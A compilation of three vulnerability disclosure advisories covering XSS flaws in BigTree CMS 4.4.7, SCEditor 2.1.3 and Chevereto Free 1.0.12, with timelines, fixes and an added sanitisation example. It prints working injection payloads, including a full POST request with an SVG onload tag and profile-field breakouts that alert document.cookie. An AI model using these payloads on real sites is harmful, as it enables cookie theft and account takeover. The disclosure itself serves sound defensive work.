BigTree CMS – XSS Vulnerability in Version 4.4.7


Product Information:

Software: BigTree CMS

Tested Version: 4.4.7, released 16.10.2019

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: BigTree is an extremely extensible open-source CMS built on PHP and MySQL. (excerpt copied from https://www.bigtreecms.org/)


The following POST request creates a tag whose name carries the payload:

POST /admin/tags/create/ HTTP/1.1
Host: demo.bigtreecms.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://demo.bigtreecms.org
Connection: close
Referer: https://demo.bigtreecms.org/admin/tags/add/
Cookie: PHPSESSID=giqced7qd6sqkrb6i2tdndbvl1; bigtree_admin[page_properties_open]=on;
bigtree_admin[email][email protected];
bigtree_admin[login]=["session-5e419446c4d265.05914498","chain-5e419446c4c097.13460452"]
Upgrade-Insecure-Requests: 1

tag="><svg/onload=alert(/xss/)/>

Impact:

A user with permission to add tags can use this to steal the cookie of a higher-privileged user.


Solution:

  • Update to BigTree CMS version 4.4.9.

Timeline:

Vulnerability found: 11.02.2020

Vendor informed: 11.02.2020

Vendor responded: 13.02.2020

Bug fixed: 28.02.2020

Version 4.4.9 released: 06.03.2020

Public Advisory: 06.04.2020


References:

https://github.com/bigtreecms/BigTree-CMS/commit/7a588580958c74dbb820991d37d7b3c8f0843668

https://github.com/bigtreecms/BigTree-CMS/commit/c34c2a7623d153549e63188eadf7ff40200b8b11

[CVE-2019-19466] SCEditor – XSS Vulnerability in Version 2.1.3


Product Information:

Software: SCEditor

Tested Version: 2.1.3, released 04.05.2018

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: A lightweight, open source, WYSIWYG BBCode and (X)HTML editor. (copied from https://www.sceditor.com/)


Vulnerability description:

There are three XSS vulnerabilities in SCEditor version 2.1.3.

The following are the three default features which are vulnerable to XSS:

  1. Insert image
  2. Insert email
  3. Insert link

The relevant code can be found in /src/lib/defaultCommands.js.

// Insert image: url is concatenated unescaped into the src attribute
editor.wysiwygEditorInsertHtml(
    '<img' + attrs + ' src="' + url + '" />' // line 505
);
// Insert email: email is concatenated unescaped into href and, via text, into the element body
editor.wysiwygEditorInsertHtml(
    '<a href="' + 'mailto:' + email + '">' + // line 550
    (text || email) +
    '</a>'
);
// Insert link: url goes unescaped into href, text unescaped into the element body
editor.wysiwygEditorInsertHtml(
    '<a href="' + url + '">' + text + '</a>' // line 610
);

Impact:

The three identified DOM-based XSS vulnerabilities have limited impact, which depends on how the url, email and text variables are populated by the embedding project. Projects implementing SCEditor should take extra care to ensure these values are properly sanitized.
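A hardened version of the three insert paths, added here as an example and not SCEditor's own code. It assumes the same url, email and text inputs as the snippet above, and takes width and height as integers in place of the original attrs string; the base URL used for parsing is a placeholder.

```javascript
// Added example, not SCEditor's own code: the three fragments from
// defaultCommands.js rebuilt so user-controlled url/email/text values are
// escaped and validated before the string is handed to insertHtml.

// Escape the characters that end an attribute value or open a tag.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Keep only http(s) and relative URLs; other schemes (javascript:, data:,
// vbscript:) are replaced with an inert value. The base URL is a placeholder.
function safeUrl(url) {
  const trimmed = String(url).trim();
  try {
    const proto = new URL(trimmed, 'https://placeholder.invalid/').protocol;
    if (proto === 'http:' || proto === 'https:') return trimmed;
  } catch (e) { /* unparsable input: fall through */ }
  return 'about:blank';
}

// Insert-image command: width/height only as positive integers (assumed
// input shape), src validated and escaped instead of concatenated raw.
function imageHtml(url, width, height) {
  let attrs = '';
  if (Number.isInteger(width) && width > 0) attrs += ' width="' + width + '"';
  if (Number.isInteger(height) && height > 0) attrs += ' height="' + height + '"';
  return '<img' + attrs + ' src="' + escapeHtml(safeUrl(url)) + '" />';
}

// Insert-email command: require a plausible address, escape both contexts.
function emailHtml(email, text) {
  const addr = String(email).trim();
  if (!/^[^\s@<>"']+@[^\s@<>"']+$/.test(addr)) return '';
  return '<a href="mailto:' + escapeHtml(addr) + '">' + escapeHtml(text || addr) + '</a>';
}

// Insert-link command: validated href, escaped link text.
function linkHtml(url, text) {
  return '<a href="' + escapeHtml(safeUrl(url)) + '">' + escapeHtml(text) + '</a>';
}

// Constructed input in the shape of the advisory's breakout payload stays inert.
console.log(linkHtml('"><svg/onload=alert(/xss/)/>', 'click'));
```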


Solution:

  • Sanitize the variables mentioned in the vulnerability description section before they are inserted into the editor as HTML.

Timeline:

Vulnerability found: 01.09.2019

Vendor informed: 01.09.2019 & 26.11.2019

Public Advisory: 05.12.2019 (90 days passed since initial contact)


References:

https://github.com/samclarke/SCEditor/commit/7fd14aecc6f0c68f1e8bb98b12f6f0da769c671a – reference for the latest version

[CVE-2018-12030] Chevereto Free – XSS Vulnerability in Version 1.0.12


Product Information:

Software: Chevereto Free

Tested Version: 1.0.12, released 23.04.2018

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: Chevereto Free has the same look and feel as our paid edition and it includes all the essential image hosting functionalities. Install it in seconds, and fall in love in minutes. (copied from https://chevereto.com/free)


Important note:

Chevereto Free is a fork of Chevereto (the paid version). This advisory focuses solely on the Free version and does not in any way refer to Chevereto (the paid version).


Vulnerability description:

There are two XSS vulnerabilities in Chevereto Free version 1.0.12.

Both are located at /chevereto/settings/profile.

Navigate as a regular user to /chevereto/settings/profile.

1) Authenticated Reflected XSS

Enter the value a" onmouseover="alert(document.cookie)" " in the name field and click Save changes. The payload is not visible after saving.

Hover the cursor over the name element and the payload triggers. Because of how the value is handled, this does not persist: submitting the payload again results in it being rendered as a plain value instead.

Affected parameter: name

2) Authenticated Stored XSS

Enter a"></textarea><svg/onload=alert(document.cookie)> in the bio field and click Save changes.

Navigate away from the current page and return to /chevereto/settings/profile. The payload triggers.

Affected parameter: bio


Impact:

The first XSS vulnerability has no practical attack scenario, since on subsequent attempts the payload is rendered as a plain value.

An attacker could potentially use the second XSS vulnerability to steal the cookie of an administrator.


Solution:


Timeline:

Vulnerability found: 06.06.2018

Vendor informed: 07.06.2018

Response by vendor: 07.06.2018

Fix by vendor: 07.06.2018

Patched version released: 07.06.2018

Public Advisory: 08.06.2018


References:

https://github.com/Chevereto/Chevereto-Free/commit/159daeab6adfe828bd06e6e74f5b647bf9b1bb70